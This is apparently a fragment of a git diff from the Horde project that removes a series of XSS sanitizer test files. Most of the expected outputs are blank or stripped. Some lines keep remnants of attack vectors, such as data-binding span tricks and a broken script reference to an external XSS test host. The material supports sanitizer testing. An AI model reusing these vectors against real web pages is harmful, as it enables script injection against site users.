-xss61.html
-<xss/>
-xss62.html
-<p>exp/*<a/></p>
-xss63.html
-
-xss64.html
-
-xss65.html
-
-xss66.html
-
-xss67.html
-
-xss68.html
-
-xss69.html
-
-xss70.html
-
-xss71.html
-
-xss72.html
-<xss>XSS</xss>
-xss73.html
-<span datasrc="#I" datafld="C" dataformatas="HTML"/>
-xss74.html
-<span datasrc="#xss" datafld="B" dataformatas="HTML"/>
-xss75.html
-<span datasrc="#I" datafld="C" dataformatas="HTML"/>
-xss76.html
-
-
-xss77.html
-
-xss78.html
-<img/>
-xss79.html
-
-xss80.html
-
-xss81.html
-
-xss82.html
-
-xss83.html
-
-xss84.html
-
-xss85.html
-<p>PT SRC="http://ha.ckers.org/a.js"></p>
-xss95.html
-<a>Click me</a>
-xss96.html
-<a>Click me</a>
-xss97.html
-
-xss98.html
-
-xss99.html
-<img src=""/>
-style_xss01.html
projects / horde.git / commitdiff